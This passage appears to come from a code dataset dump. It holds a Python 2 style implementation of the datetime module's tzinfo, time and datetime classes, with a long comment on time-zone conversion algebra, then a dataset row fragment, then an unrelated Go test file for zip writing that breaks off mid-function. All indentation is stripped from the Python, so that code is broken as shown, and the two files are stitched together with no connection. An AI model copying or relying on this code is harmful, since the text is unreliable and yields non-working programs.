Subclasses must override the name(), utcoffset() and dst() methods.
"""
__slots__ = ()
def tzname(self, dt):
"datetime -> string name of time zone."
raise NotImplementedError("tzinfo subclass must override tzname()")
def utcoffset(self, dt):
"datetime -> minutes east of UTC (negative for west of UTC)"
raise NotImplementedError("tzinfo subclass must override utcoffset()")
def dst(self, dt):
"""datetime -> DST offset in minutes east of UTC.
Return 0 if DST not in effect. utcoffset() must include the DST
offset.
"""
raise NotImplementedError("tzinfo subclass must override dst()")
def fromutc(self, dt):
"datetime in UTC -> datetime in local time."
if not isinstance(dt, datetime):
raise TypeError("fromutc() requires a datetime argument")
if dt.tzinfo is not self:
raise ValueError("dt.tzinfo is not self")
dtoff = dt.utcoffset()
if dtoff is None:
raise ValueError("fromutc() requires a non-None utcoffset() "
"result")
# See the long comment block at the end of this file for an
# explanation of this algorithm.
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc() requires a non-None dst() result")
delta = dtoff - dtdst
if delta:
dt += delta
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc(): dt.dst gave inconsistent "
"results; cannot convert")
if dtdst:
return dt + dtdst
else:
return dt
# Pickle support.
def __reduce__(self):
getinitargs = getattr(self, "__getinitargs__", None)
if getinitargs:
args = getinitargs()
else:
args = ()
getstate = getattr(self, "__getstate__", None)
if getstate:
state = getstate()
else:
state = getattr(self, "__dict__", None) or None
if state is None:
return (self.__class__, args)
else:
return (self.__class__, args, state)
_tzinfo_class = tzinfo
class time(object):
"""Time with time zone.
Constructors:
__new__()
Operators:
__repr__, __str__
__cmp__, __hash__
Methods:
strftime()
isoformat()
utcoffset()
tzname()
dst()
Properties (readonly):
hour, minute, second, microsecond, tzinfo
"""
__slots__ = '_hour', '_minute', '_second', '_microsecond', '_tzinfo', '_hashcode'
def __new__(cls, hour=0, minute=0, second=0, microsecond=0, tzinfo=None):
"""Constructor.
Arguments:
hour, minute (required)
second, microsecond (default to zero)
tzinfo (default to None)
"""
# if isinstance(hour, bytes) and len(hour) == 6 and ord(hour[0]) < 24:
# # Pickle support
# self = object.__new__(cls)
# self.__setstate(hour, minute or None)
# self._hashcode = -1
# return self
hour, minute, second, microsecond = _check_time_fields(
hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
self = object.__new__(cls)
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
self._hashcode = -1
return self
# Read-only field accessors
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
# Standard conversions, __hash__ (and helpers)
# Comparisons of time objects with other.
def __eq__(self, other):
if isinstance(other, time):
return self._cmp(other) == 0
else:
return False
def __ne__(self, other):
if isinstance(other, time):
return self._cmp(other) != 0
else:
return True
def __le__(self, other):
if isinstance(other, time):
return self._cmp(other) <= 0
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, time):
return self._cmp(other) < 0
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, time):
return self._cmp(other) >= 0
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, time):
return self._cmp(other) > 0
else:
_cmperror(self, other)
def _cmp(self, other):
assert isinstance(other, time)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
myoff = self._utcoffset()
otoff = other._utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._hour, self._minute, self._second,
self._microsecond),
(other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
raise TypeError("can't compare offset-naive and offset-aware times")
myhhmm = self._hour * 60 + self._minute - myoff
othhmm = other._hour * 60 + other._minute - otoff
return _cmp((myhhmm, self._second, self._microsecond),
(othhmm, other._second, other._microsecond))
def __hash__(self):
"""Hash."""
if self._hashcode == -1:
tzoff = self._utcoffset()
if not tzoff: # zero or None
self._hashcode = hash(self._getstate()[0])
else:
h, m = divmod(self.hour * 60 + self.minute - tzoff, 60)
if 0 <= h < 24:
self._hashcode = hash(time(h, m, self.second, self.microsecond))
else:
self._hashcode = hash((h, m, self.second, self.microsecond))
return self._hashcode
# Conversion to string
def _tzstr(self, sep=":"):
"""Return formatted timezone offset (+xx:xx) or None."""
off = self._utcoffset()
if off is not None:
if off < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, 60)
assert 0 <= hh < 24
off = "%s%02d%s%02d" % (sign, hh, sep, mm)
return off
def __repr__(self):
"""Convert to formal string, for repr()."""
if self._microsecond != 0:
s = ", %d, %d" % (self._second, self._microsecond)
elif self._second != 0:
s = ", %d" % self._second
else:
s = ""
module = "datetime." if self.__class__ is time else ""
s= "%s(%d, %d%s)" % (module + self.__class__.__name__,
self._hour, self._minute, s)
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def isoformat(self):
"""Return the time formatted according to ISO.
This is 'HH:MM:SS.mmmmmm+zz:zz', or 'HH:MM:SS+zz:zz' if
self.microsecond == 0.
"""
s = _format_time(self._hour, self._minute, self._second,
self._microsecond)
tz = self._tzstr()
if tz:
s += tz
return s
__str__ = isoformat
# def strftime(self, format):
# """Format using strftime(). The date part of the timestamp passed
# to underlying strftime should not be used.
# """
# # The year must be >= _MINYEARFMT else Python's strftime implementation
# # can raise a bogus exception.
# timetuple = (1900, 1, 1,
# self._hour, self._minute, self._second,
# 0, 1, -1)
# return _wrap_strftime(self, format, timetuple)
def __format__(self, fmt):
if not isinstance(fmt, (str, unicode)):
raise ValueError("__format__ expects str or unicode, not %s" %
fmt.__class__.__name__)
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
# Timezone functions
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(None)
offset = _check_utc_offset("utcoffset", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _utcoffset(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(None)
offset = _check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
if self._tzinfo is None:
return None
name = self._tzinfo.tzname(None)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(None)
offset = _check_utc_offset("dst", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _dst(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(None)
offset = _check_utc_offset("dst", offset)
return offset
def replace(self, hour=None, minute=None, second=None, microsecond=None,
tzinfo=True):
"""Return a new time with new values for the specified fields."""
if hour is None:
hour = self.hour
if minute is None:
minute = self.minute
if second is None:
second = self.second
if microsecond is None:
microsecond = self.microsecond
if tzinfo is True:
tzinfo = self.tzinfo
return time.__new__(type(self),
hour, minute, second, microsecond, tzinfo)
def __nonzero__(self):
if self.second or self.microsecond:
return True
offset = self._utcoffset() or 0
return self.hour * 60 + self.minute != offset
# Pickle support.
def _getstate(self):
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = _struct.pack('6B', self._hour, self._minute, self._second,
us1, us2, us3)
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
if tzinfo is not None and not isinstance(tzinfo, _tzinfo_class):
raise TypeError("bad tzinfo state arg")
self._hour, self._minute, self._second, us1, us2, us3 = (
ord(string[0]), ord(string[1]), ord(string[2]),
ord(string[3]), ord(string[4]), ord(string[5]))
self._microsecond = (((us1 << 8) | us2) << 8) | us3
self._tzinfo = tzinfo
def __reduce__(self):
return (time, self._getstate())
_time_class = time # so functions w/ args named "time" can get at the class
time.min = time(0, 0, 0)
time.max = time(23, 59, 59, 999999)
time.resolution = timedelta(microseconds=1)
class datetime(date):
"""datetime(year, month, day[, hour[, minute[, second[, microsecond[,tzinfo]]]]])
The year, month and day arguments are required. tzinfo may be None, or an
instance of a tzinfo subclass. The remaining arguments may be ints or longs.
"""
__slots__ = date.__slots__ + time.__slots__
def __new__(cls, year, month=None, day=None, hour=0, minute=0, second=0,
microsecond=0, tzinfo=None):
# if isinstance(year, bytes) and len(year) == 10 and \
# 1 <= ord(year[2]) <= 12:
# # Pickle support
# self = object.__new__(cls)
# self.__setstate(year, month)
# self._hashcode = -1
# return self
year, month, day = _check_date_fields(year, month, day)
hour, minute, second, microsecond = _check_time_fields(
hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
self = object.__new__(cls)
self._year = year
self._month = month
self._day = day
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
self._hashcode = -1
return self
# Read-only field accessors
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
@classmethod
def fromtimestamp(cls, timestamp, tz=None):
"""Construct a datetime from a POSIX timestamp (like time.time()).
A timezone info object may be passed in as well.
"""
_check_tzinfo_arg(tz)
converter = _time.localtime if tz is None else _time.gmtime
self = cls._from_timestamp(converter, timestamp, tz)
if tz is not None:
self = tz.fromutc(self)
return self
@classmethod
def utcfromtimestamp(cls, t):
"Construct a UTC datetime from a POSIX timestamp (like time.time())."
return cls._from_timestamp(_time.gmtime, t, None)
@classmethod
def _from_timestamp(cls, converter, timestamp, tzinfo):
t_full = timestamp
timestamp = int(_math.floor(timestamp))
frac = t_full - timestamp
us = _round(frac * 1e6)
# If timestamp is less than one microsecond smaller than a
# full second, us can be rounded up to 1000000. In this case,
# roll over to seconds, otherwise, ValueError is raised
# by the constructor.
if us == 1000000:
timestamp += 1
us = 0
y, m, d, hh, mm, ss, weekday, jday, dst = converter(timestamp)
ss = min(ss, 59) # clamp out leap seconds if the platform has them
return cls(y, m, d, hh, mm, ss, us, tzinfo)
@classmethod
def now(cls, tz=None):
"Construct a datetime from time.time() and optional time zone info."
t = _time.time()
return cls.fromtimestamp(t, tz)
@classmethod
def utcnow(cls):
"Construct a UTC datetime from time.time()."
t = _time.time()
return cls.utcfromtimestamp(t)
@classmethod
def combine(cls, date, time):
"Construct a datetime from a given date and a given time."
if not isinstance(date, _date_class):
raise TypeError("date argument must be a date instance")
if not isinstance(time, _time_class):
raise TypeError("time argument must be a time instance")
return cls(date.year, date.month, date.day,
time.hour, time.minute, time.second, time.microsecond,
time.tzinfo)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
dst = self._dst()
if dst is None:
dst = -1
elif dst:
dst = 1
return _build_struct_time(self.year, self.month, self.day,
self.hour, self.minute, self.second,
dst)
def utctimetuple(self):
"Return UTC time tuple compatible with time.gmtime()."
y, m, d = self.year, self.month, self.day
hh, mm, ss = self.hour, self.minute, self.second
offset = self._utcoffset()
if offset: # neither None nor 0
mm -= offset
y, m, d, hh, mm, ss, _ = _normalize_datetime(
y, m, d, hh, mm, ss, 0, ignore_overflow=True)
return _build_struct_time(y, m, d, hh, mm, ss, 0)
def date(self):
"Return the date part."
return date(self._year, self._month, self._day)
def time(self):
"Return the time part, with tzinfo None."
return time(self.hour, self.minute, self.second, self.microsecond)
def timetz(self):
"Return the time part, with same tzinfo."
return time(self.hour, self.minute, self.second, self.microsecond,
self._tzinfo)
def replace(self, year=None, month=None, day=None, hour=None,
minute=None, second=None, microsecond=None, tzinfo=True):
"""Return a new datetime with new values for the specified fields."""
if year is None:
year = self.year
if month is None:
month = self.month
if day is None:
day = self.day
if hour is None:
hour = self.hour
if minute is None:
minute = self.minute
if second is None:
second = self.second
if microsecond is None:
microsecond = self.microsecond
if tzinfo is True:
tzinfo = self.tzinfo
return datetime.__new__(type(self),
year, month, day, hour, minute, second,
microsecond, tzinfo)
def astimezone(self, tz):
if not isinstance(tz, tzinfo):
raise TypeError("tz argument must be an instance of tzinfo")
mytz = self.tzinfo
if mytz is None:
raise ValueError("astimezone() requires an aware datetime")
if tz is mytz:
return self
# Convert self to UTC, and attach the new time zone object.
myoffset = self.utcoffset()
if myoffset is None:
raise ValueError("astimezone() requires an aware datetime")
utc = (self - myoffset).replace(tzinfo=tz)
# Convert from UTC to tz's local time.
return tz.fromutc(utc)
# Ways to produce a string.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d %02d:%02d:%02d %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day,
self._hour, self._minute, self._second,
self._year)
def isoformat(self, sep='T'):
"""Return the time formatted according to ISO.
This is 'YYYY-MM-DD HH:MM:SS.mmmmmm', or 'YYYY-MM-DD HH:MM:SS' if
self.microsecond == 0.
If self.tzinfo is not None, the UTC offset is also attached, giving
'YYYY-MM-DD HH:MM:SS.mmmmmm+HH:MM' or 'YYYY-MM-DD HH:MM:SS+HH:MM'.
Optional argument sep specifies the separator between date and
time, default 'T'.
"""
s = ("%04d-%02d-%02d%c" % (self._year, self._month, self._day, sep) +
_format_time(self._hour, self._minute, self._second,
self._microsecond))
off = self._utcoffset()
if off is not None:
if off < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, 60)
s += "%s%02d:%02d" % (sign, hh, mm)
return s
def __repr__(self):
"""Convert to formal string, for repr()."""
L = [self._year, self._month, self._day, # These are never zero
self._hour, self._minute, self._second, self._microsecond]
if L[-1] == 0:
del L[-1]
if L[-1] == 0:
del L[-1]
s = ", ".join(map(str, L))
module = "datetime." if self.__class__ is datetime else ""
s = "%s(%s)" % (module + self.__class__.__name__, s)
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def __str__(self):
"Convert to string, for str()."
return self.isoformat(sep=' ')
# @classmethod
# def strptime(cls, date_string, format):
# 'string, format -> new datetime parsed from a string (like time.strptime()).'
# from _strptime import _strptime
# # _strptime._strptime returns a two-element tuple. The first
# # element is a time.struct_time object. The second is the
# # microseconds (which are not defined for time.struct_time).
# struct, micros = _strptime(date_string, format)
# return cls(*(struct[0:6] + (micros,)))
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(self)
offset = _check_utc_offset("utcoffset", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _utcoffset(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(self)
offset = _check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
if self._tzinfo is None:
return None
name = self._tzinfo.tzname(self)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(self)
offset = _check_utc_offset("dst", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _dst(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(self)
offset = _check_utc_offset("dst", offset)
return offset
# Comparisons of datetime objects with other.
def __eq__(self, other):
if isinstance(other, datetime):
return self._cmp(other) == 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
return False
def __ne__(self, other):
if isinstance(other, datetime):
return self._cmp(other) != 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
return True
def __le__(self, other):
if isinstance(other, datetime):
return self._cmp(other) <= 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) < 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, datetime):
return self._cmp(other) >= 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) > 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def _cmp(self, other):
assert isinstance(other, datetime)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
if mytz is not None:
myoff = self._utcoffset()
if ottz is not None:
otoff = other._utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._year, self._month, self._day,
self._hour, self._minute, self._second,
self._microsecond),
(other._year, other._month, other._day,
other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
raise TypeError("can't compare offset-naive and offset-aware datetimes")
# XXX What follows could be done more efficiently...
diff = self - other # this will take offsets into account
if diff.days < 0:
return -1
return diff and 1 or 0
def _add_timedelta(self, other, factor):
y, m, d, hh, mm, ss, us = _normalize_datetime(
self._year,
self._month,
self._day + other.days * factor,
self._hour,
self._minute,
self._second + other.seconds * factor,
self._microsecond + other.microseconds * factor)
return datetime(y, m, d, hh, mm, ss, us, tzinfo=self._tzinfo)
def __add__(self, other):
"Add a datetime and a timedelta."
if not isinstance(other, timedelta):
return NotImplemented
return self._add_timedelta(other, 1)
__radd__ = __add__
def __sub__(self, other):
"Subtract two datetimes, or a datetime and a timedelta."
if not isinstance(other, datetime):
if isinstance(other, timedelta):
return self._add_timedelta(other, -1)
return NotImplemented
delta_d = self.toordinal() - other.toordinal()
delta_s = (self._hour - other._hour) * 3600 + \
(self._minute - other._minute) * 60 + \
(self._second - other._second)
delta_us = self._microsecond - other._microsecond
base = timedelta._create(delta_d, delta_s, delta_us, True)
if self._tzinfo is other._tzinfo:
return base
myoff = self._utcoffset()
otoff = other._utcoffset()
if myoff == otoff:
return base
if myoff is None or otoff is None:
raise TypeError("can't subtract offset-naive and offset-aware datetimes")
return base + timedelta(minutes = otoff-myoff)
def __hash__(self):
if self._hashcode == -1:
tzoff = self._utcoffset()
if tzoff is None:
self._hashcode = hash(self._getstate()[0])
else:
days = _ymd2ord(self.year, self.month, self.day)
seconds = self.hour * 3600 + (self.minute - tzoff) * 60 + self.second
self._hashcode = hash(timedelta(days, seconds, self.microsecond))
return self._hashcode
# Pickle support.
def _getstate(self):
yhi, ylo = divmod(self._year, 256)
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = _struct.pack('10B', yhi, ylo, self._month, self._day,
self._hour, self._minute, self._second,
us1, us2, us3)
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
if tzinfo is not None and not isinstance(tzinfo, _tzinfo_class):
raise TypeError("bad tzinfo state arg")
(yhi, ylo, self._month, self._day, self._hour,
self._minute, self._second, us1, us2, us3) = (ord(string[0]),
ord(string[1]), ord(string[2]), ord(string[3]),
ord(string[4]), ord(string[5]), ord(string[6]),
ord(string[7]), ord(string[8]), ord(string[9]))
self._year = yhi * 256 + ylo
self._microsecond = (((us1 << 8) | us2) << 8) | us3
self._tzinfo = tzinfo
def __reduce__(self):
return (self.__class__, self._getstate())
datetime.min = datetime(1, 1, 1)
datetime.max = datetime(9999, 12, 31, 23, 59, 59, 999999)
datetime.resolution = timedelta(microseconds=1)
def _isoweek1monday(year):
# Helper to calculate the day number of the Monday starting week 1
# XXX This could be done more efficiently
THURSDAY = 3
firstday = _ymd2ord(year, 1, 1)
firstweekday = (firstday + 6) % 7 # See weekday() above
week1monday = firstday - firstweekday
if firstweekday > THURSDAY:
week1monday += 7
return week1monday
"""
Some time zone algebra. For a datetime x, let
x.n = x stripped of its timezone -- its naive time.
x.o = x.utcoffset(), and assuming that doesn't raise an exception or
return None
x.d = x.dst(), and assuming that doesn't raise an exception or
return None
x.s = x's standard offset, x.o - x.d
Now some derived rules, where k is a duration (timedelta).
1. x.o = x.s + x.d
This follows from the definition of x.s.
2. If x and y have the same tzinfo member, x.s = y.s.
This is actually a requirement, an assumption we need to make about
sane tzinfo classes.
3. The naive UTC time corresponding to x is x.n - x.o.
This is again a requirement for a sane tzinfo class.
4. (x+k).s = x.s
This follows from #2, and that datimetimetz+timedelta preserves tzinfo.
5. (x+k).n = x.n + k
Again follows from how arithmetic is defined.
Now we can explain tz.fromutc(x). Let's assume it's an interesting case
(meaning that the various tzinfo methods exist, and don't blow up or return
None when called).
The function wants to return a datetime y with timezone tz, equivalent to x.
x is already in UTC.
By #3, we want
y.n - y.o = x.n [1]
The algorithm starts by attaching tz to x.n, and calling that y. So
x.n = y.n at the start. Then it wants to add a duration k to y, so that [1]
becomes true; in effect, we want to solve [2] for k:
(y+k).n - (y+k).o = x.n [2]
By #1, this is the same as
(y+k).n - ((y+k).s + (y+k).d) = x.n [3]
By #5, (y+k).n = y.n + k, which equals x.n + k because x.n=y.n at the start.
Substituting that into [3],
x.n + k - (y+k).s - (y+k).d = x.n; the x.n terms cancel, leaving
k - (y+k).s - (y+k).d = 0; rearranging,
k = (y+k).s - (y+k).d; by #4, (y+k).s == y.s, so
k = y.s - (y+k).d
On the RHS, (y+k).d can't be computed directly, but y.s can be, and we
approximate k by ignoring the (y+k).d term at first. Note that k can't be
very large, since all offset-returning methods return a duration of magnitude
less than 24 hours. For that reason, if y is firmly in std time, (y+k).d must
be 0, so ignoring it has no consequence then.
In any case, the new value is
z = y + y.s [4]
It's helpful to step back at look at [4] from a higher level: it's simply
mapping from UTC to tz's standard time.
At this point, if
z.n - z.o = x.n [5]
we have an equivalent time, and are almost done. The insecurity here is
at the start of daylight time. Picture US Eastern for concreteness. The wall
time jumps from 1:59 to 3:00, and wall hours of the form 2:MM don't make good
sense then. The docs ask that an Eastern tzinfo class consider such a time to
be EDT (because it's "after 2"), which is a redundant spelling of 1:MM EST
on the day DST starts. We want to return the 1:MM EST spelling because that's
the only spelling that makes sense on the local wall clock.
In fact, if [5] holds at this point, we do have the standard-time spelling,
but that takes a bit of proof. We first prove a stronger result. What's the
difference between the LHS and RHS of [5]? Let
diff = x.n - (z.n - z.o) [6]
Now
z.n = by [4]
(y + y.s).n = by #5
y.n + y.s = since y.n = x.n
x.n + y.s = since z and y are have the same tzinfo member,
y.s = z.s by #2
x.n + z.s
Plugging that back into [6] gives
diff =
x.n - ((x.n + z.s) - z.o) = expanding
x.n - x.n - z.s + z.o = cancelling
- z.s + z.o = by #2
z.d
So diff = z.d.
If [5] is true now, diff = 0, so z.d = 0 too, and we have the standard-time
spelling we wanted in the endcase described above. We're done. Contrarily,
if z.d = 0, then we have a UTC equivalent, and are also done.
If [5] is not true now, diff = z.d != 0, and z.d is the offset we need to
add to z (in effect, z is in tz's standard time, and we need to shift the
local clock into tz's daylight time).
Let
z' = z + z.d = z + diff [7]
and we can again ask whether
z'.n - z'.o = x.n [8]
If so, we're done. If not, the tzinfo class is insane, according to the
assumptions we've made. This also requires a bit of proof. As before, let's
compute the difference between the LHS and RHS of [8] (and skipping some of
the justifications for the kinds of substitutions we've done several times
already):
diff' = x.n - (z'.n - z'.o) = replacing z'.n via [7]
x.n - (z.n + diff - z'.o) = replacing diff via [6]
x.n - (z.n + x.n - (z.n - z.o) - z'.o) =
x.n - z.n - x.n + z.n - z.o + z'.o = cancel x.n
- z.n + z.n - z.o + z'.o = cancel z.n
- z.o + z'.o = #1 twice
-z.s - z.d + z'.s + z'.d = z and z' have same tzinfo
z'.d - z.d
So z' is UTC-equivalent to x iff z'.d = z.d at this point. If they are equal,
we've found the UTC-equivalent so are done. In fact, we stop with [7] and
return z', not bothering to compute z'.d.
How could z.d and z'd differ? z' = z + z.d [7], so merely moving z' by
a dst() offset, and starting *from* a time already in DST (we know z.d != 0),
would have to change the result dst() returns: we start in DST, and moving
a little further into it takes us out of DST.
There isn't a sane case where this can happen. The closest it gets is at
the end of DST, where there's an hour in UTC with no spelling in a hybrid
tzinfo class. In US Eastern, that's 5:MM UTC = 0:MM EST = 1:MM EDT. During
that hour, on an Eastern clock 1:MM is taken as being in standard time (6:MM
UTC) because the docs insist on that, but 0:MM is taken as being in daylight
time (4:MM UTC). There is no local time mapping to 5:MM UTC. The local
clock jumps from 1:59 back to 1:00 again, and repeats the 1:MM hour in
standard time. Since that's what the local clock *does*, we want to map both
UTC hours 5:MM and 6:MM to 1:MM Eastern. The result is ambiguous
in local time, but so it goes -- it's the way the local clock works.
When x = 5:MM UTC is the input to this algorithm, x.o=0, y.o=-5 and y.d=0,
so z=0:MM. z.d=60 (minutes) then, so [5] doesn't hold and we keep going.
z' = z + z.d = 1:MM then, and z'.d=0, and z'.d - z.d = -60 != 0 so [8]
(correctly) concludes that z' is not UTC-equivalent to x.
Because we know z.d said z was in daylight time (else [5] would have held and
we would have stopped then), and we know z.d != z'.d (else [8] would have held
and we have stopped then), and there are only 2 possible values dst() can
return in Eastern, it follows that z'.d must be 0 (which it is in the example,
but the reasoning doesn't depend on the example -- it depends on there being
two possible dst() outcomes, one zero and the other non-zero). Therefore
z' must be in standard time, and is the spelling we want in this case.
Note again that z' is not UTC-equivalent as far as the hybrid tzinfo class is
concerned (because it takes z' as being in standard time rather than the
daylight time we intend here), but returning it gives the real-life "local
clock repeats an hour" behavior when mapping the "unspellable" UTC hour into
tz.
When the input is 6:MM, z=1:MM and z.d=0, and we stop at once, again with
the 1:MM standard time spelling we want.
So how can this break? One of the assumptions must be violated. Two
possibilities:
1) [2] effectively says that y.s is invariant across all y belong to a given
time zone. This isn't true if, for political reasons or continental drift,
a region decides to change its base offset from UTC.
2) There may be versions of "double daylight" time where the tail end of
the analysis gives up a step too early. I haven't thought about that
enough to say.
In any case, it's clear that the default fromutc() is strong enough to handle
"almost all" time zones: so long as the standard offset is invariant, it
doesn't matter if daylight time transition points change from year to year, or
if daylight time is skipped in some years; it doesn't matter how large or
small dst() may get within its bounds; and it doesn't even matter if some
perverse time zone returns a negative dst()). So a breaking case must be
pretty bizarre, and a tzinfo subclass can override fromutc() if it is.
""" | unknown | codeparrot/codeparrot-clean | ||
// Copyright 2011 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package zip
import (
"bytes"
"compress/flate"
"encoding/binary"
"fmt"
"hash/crc32"
"io"
"io/fs"
"math/rand"
"os"
"strings"
"testing"
"testing/fstest"
"time"
)
// TODO(adg): a more sophisticated test suite
type WriteTest struct {
Name string
Data []byte
Method uint16
Mode fs.FileMode
}
var writeTests = []WriteTest{
{
Name: "foo",
Data: []byte("Rabbits, guinea pigs, gophers, marsupial rats, and quolls."),
Method: Store,
Mode: 0666,
},
{
Name: "bar",
Data: nil, // large data set in the test
Method: Deflate,
Mode: 0644,
},
{
Name: "setuid",
Data: []byte("setuid file"),
Method: Deflate,
Mode: 0755 | fs.ModeSetuid,
},
{
Name: "setgid",
Data: []byte("setgid file"),
Method: Deflate,
Mode: 0755 | fs.ModeSetgid,
},
{
Name: "symlink",
Data: []byte("../link/target"),
Method: Deflate,
Mode: 0755 | fs.ModeSymlink,
},
{
Name: "device",
Data: []byte("device file"),
Method: Deflate,
Mode: 0755 | fs.ModeDevice,
},
{
Name: "chardevice",
Data: []byte("char device file"),
Method: Deflate,
Mode: 0755 | fs.ModeDevice | fs.ModeCharDevice,
},
}
func TestWriter(t *testing.T) {
largeData := make([]byte, 1<<17)
if _, err := rand.Read(largeData); err != nil {
t.Fatal("rand.Read failed:", err)
}
writeTests[1].Data = largeData
defer func() {
writeTests[1].Data = nil
}()
// write a zip file
buf := new(bytes.Buffer)
w := NewWriter(buf)
for _, wt := range writeTests {
testCreate(t, w, &wt)
}
if err := w.Close(); err != nil {
t.Fatal(err)
}
// read it back
r, err := NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
if err != nil {
t.Fatal(err)
}
for i, wt := range writeTests {
testReadFile(t, r.File[i], &wt)
}
}
// TestWriterComment is test for EOCD comment read/write.
func TestWriterComment(t *testing.T) {
tests := []struct {
comment string
ok bool
}{
{"hi, hello", true},
{"hi, こんにちわ", true},
{strings.Repeat("a", uint16max), true},
{strings.Repeat("a", uint16max+1), false},
}
for _, test := range tests {
// write a zip file
buf := new(bytes.Buffer)
w := NewWriter(buf)
if err := w.SetComment(test.comment); err != nil {
if test.ok {
t.Fatalf("SetComment: unexpected error %v", err)
}
continue
} else {
if !test.ok {
t.Fatalf("SetComment: unexpected success, want error")
}
}
if err := w.Close(); test.ok == (err != nil) {
t.Fatal(err)
}
if w.closed != test.ok {
t.Fatalf("Writer.closed: got %v, want %v", w.closed, test.ok)
}
// skip read test in failure cases
if !test.ok {
continue
}
// read it back
r, err := NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
if err != nil {
t.Fatal(err)
}
if r.Comment != test.comment {
